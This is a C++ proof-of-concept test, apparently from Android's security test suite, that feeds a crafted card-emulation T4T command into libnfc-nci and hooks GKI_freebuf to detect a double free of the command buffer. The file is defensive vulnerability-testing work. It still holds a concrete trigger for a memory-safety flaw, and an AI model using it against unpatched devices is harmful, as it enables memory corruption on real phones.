1 /**
2  * Copyright (C) 2022 The Android Open Source Project
3  *
4  * Licensed under the Apache License, Version 2.0 (the "License");
5  * you may not use this file except in compliance with the License.
6  * You may obtain a copy of the License at
7  *
8  *      http://www.apache.org/licenses/LICENSE-2.0
9  *
10  * Unless required by applicable law or agreed to in writing, software
11  * distributed under the License is distributed on an "AS IS" BASIS,
12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13  * See the License for the specific language governing permissions and
14  * limitations under the License.
15  */
16 
17 #include <ce_int.h>
18 #include <dlfcn.h>
19 #include <nfc_int.h>
20 #include <rw_int.h>
21 #include "../includes/common.h"
22 
// Control blocks that live in libnfc-nci; the harness reads and writes them directly.
extern tNFC_CB nfc_cb;
extern tCE_CB ce_cb;

// The library's own GKI_freebuf, looked up by init() with dlsym(RTLD_NEXT, ...).
// Stays nullptr until that lookup succeeds.
static void (*real_GKI_freebuf)(void *ptr) = nullptr;

// Harness state; all three are constant-initialized to false.
bool isInitialized = false;     // real_GKI_freebuf has been resolved
bool isTestInProgress = false;  // frees are only tracked while this is set
bool isVulnerable = false;      // set when the tracked buffer is released twice
34 
// A buffer under observation: the address handed to the library, plus whether
// GKI_freebuf() has already seen it released once.
struct myPtr {
    void *ptr{nullptr};
    bool isFreed{false};
};

// The single buffer the test watches for a double release.
myPtr vulnerablePtr{};
41 
/**
 * Resolves the library's GKI_freebuf (mangled name "_Z11GKI_freebufPv") from the
 * next object in the lookup order and stores it in real_GKI_freebuf.
 *
 * isInitialized is set only when the lookup succeeds; on failure both the
 * function pointer and the flag are left as they were.
 */
void init() {
    using freebuf_fn = void (*)(void *);
    real_GKI_freebuf = reinterpret_cast<freebuf_fn>(dlsym(RTLD_NEXT, "_Z11GKI_freebufPv"));
    if (real_GKI_freebuf != nullptr) {
        isInitialized = true;
    }
}
49 
// No-op definition with the library's signature. NOTE(review): presumably this
// shadows the library's timer routine so the test needs no GKI timer machinery
// — confirm against the link order.
void nfc_start_quick_timer(TIMER_LIST_ENT *, uint16_t, uint32_t) {}
53 
// No-op definition with the library's signature; see nfc_start_quick_timer.
void nfc_stop_timer(TIMER_LIST_ENT *) {}
57 
// No-op definition with the library's signature; see nfc_start_quick_timer.
void nfc_stop_quick_timer(TIMER_LIST_ENT *) {}
61 
/**
 * Replacement for the library's GKI_freebuf(void *) that counts releases of the
 * tracked buffer and then forwards to the real implementation resolved by init().
 *
 * While isTestInProgress is set: the first release of vulnerablePtr.ptr marks it
 * as freed, and any later release of the same address sets isVulnerable. Outside
 * a test window the call is simply forwarded.
 *
 * NOTE(review): if init() could not resolve "_Z11GKI_freebufPv", real_GKI_freebuf
 * is still nullptr and the forwarding call is a null function call; callers are
 * expected to have confirmed isInitialized beforehand.
 */
void GKI_freebuf(void *ptr) {
    if (!isInitialized) {
        init();
    }
    const bool tracked = isTestInProgress && (ptr == vulnerablePtr.ptr);
    if (tracked) {
        // Seeing the tracked buffer again after it was already marked freed is
        // exactly the double release this harness reports.
        if (vulnerablePtr.isFreed) {
            isVulnerable = true;
        }
        vulnerablePtr.isFreed = true;
    }
    real_GKI_freebuf(ptr);
}
77 
// RW event callback registered by main(); the test ignores every event.
void poc_cback(tRW_EVENT, tRW_DATA *) {}
80 
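/**
 * Drives one CE T4T data indication through libnfc-nci while GKI_freebuf() above
 * watches the command buffer, and reports whether that buffer was released twice.
 *
 * Returns EXIT_VULNERABLE when a double release was observed, EXIT_SUCCESS
 * otherwise; FAIL_CHECK terminates the test on any setup precondition that fails.
 */
int main() {
    // Resolve the library's GKI_freebuf up front so a failed lookup shows up as a
    // clean test failure here rather than a null function call inside the library.
    init();
    FAIL_CHECK(isInitialized);

    // Activate an ISO-DEP tag in poll-A mode and route RW events to the no-op callback.
    tNFC_ACTIVATE_DEVT p_activate_params = {};
    p_activate_params.protocol = NFC_PROTOCOL_ISO_DEP;
    p_activate_params.rf_tech_param.mode = NFC_DISCOVERY_TYPE_POLL_A;
    RW_SetActivatedTagType(&p_activate_params, &poc_cback);
    FAIL_CHECK(rw_cb.p_cback == &poc_cback);

    GKI_init();

    FAIL_CHECK(ce_select_t4t() == NFC_STATUS_OK);

    // Put the CE T4T control block into the state the test exercises.
    ce_cb.mem.t4t.selected_aid_idx = CE_T4T_MAX_REG_AID;
    ce_cb.mem.t4t.status = CE_T4T_STATUS_REG_AID_SELECTED;

    tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
    // The connection callback is invoked below; fail cleanly instead of
    // dereferencing a null pointer if it was never installed.
    FAIL_CHECK(p_cb->p_cback != nullptr);

    // GKI_getbuf() may return nullptr; neither result was checked before use.
    tNFC_CONN *p_data = (tNFC_CONN *) GKI_getbuf(sizeof(tNFC_CONN));
    FAIL_CHECK(p_data != nullptr);
    p_data->data.p_data = (NFC_HDR *) GKI_getbuf(sizeof(NFC_HDR) + 1);
    FAIL_CHECK(p_data->data.p_data != nullptr);

    // The one-byte command buffer is the object watched for a double release.
    NFC_HDR *p_c_apdu = (NFC_HDR *) p_data->data.p_data;
    vulnerablePtr.ptr = p_c_apdu;

    // Payload of length 1 immediately follows the header (buffer is sizeof(NFC_HDR) + 1).
    p_c_apdu->len = 1;
    p_c_apdu->offset = 0;
    uint8_t *p = (uint8_t *) (p_c_apdu + 1) + p_c_apdu->offset;
    p[0] = T4T_CMD_CLASS;

    // Only releases that happen inside this window are counted by GKI_freebuf().
    isTestInProgress = true;
    uint8_t conn_id = 1;
    p_cb->p_cback(conn_id, NFC_DATA_CEVT, p_data);
    isTestInProgress = false;

    return isVulnerable ? EXIT_VULNERABLE : EXIT_SUCCESS;
}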